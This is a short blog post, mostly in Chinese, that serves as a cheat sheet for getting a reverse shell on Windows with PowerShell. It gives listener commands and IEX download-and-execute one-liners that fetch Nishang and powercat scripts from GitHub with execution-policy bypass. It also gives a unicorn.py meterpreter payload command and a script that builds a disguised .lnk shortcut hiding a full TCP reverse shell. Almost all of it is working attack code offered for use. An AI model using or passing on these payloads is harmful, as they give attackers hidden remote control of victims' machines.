Get Shell By PowerShell
ssooking Lv5
  2017-08-30 15:12:00 2017-08-30 15:12    

Invoke-PowerShellTcp.ps1

监听:nc -nv -l -p 9999

目标执行:

1
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 监听主机ip -Port 监听端口"

unicorn.py

1
python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

powercat.ps1

监听:nc -nv -l -p 9999

目标执行:

1
powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 监听主机ip  -p 9999 -e cmd.exe"

Lnk Powershell

生成快捷方式shell的Powershell脚本

1
2
3
4
5
6
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("c:\lnk_tests\payload.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = '-windowstyle hidden /c $client = New-Object System.Net.Sockets.TCPClient("""192.168.1.10""",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + """PS """ + (pwd).Path + """> """;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Shortcut.Save()
  • Post title:Get Shell By PowerShell
  • Post author:ssooking
  • Create time:2017-08-30 15:12:00
  • Post link:https://ssooking.github.io/2017/08/get-shell-by-powershell/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.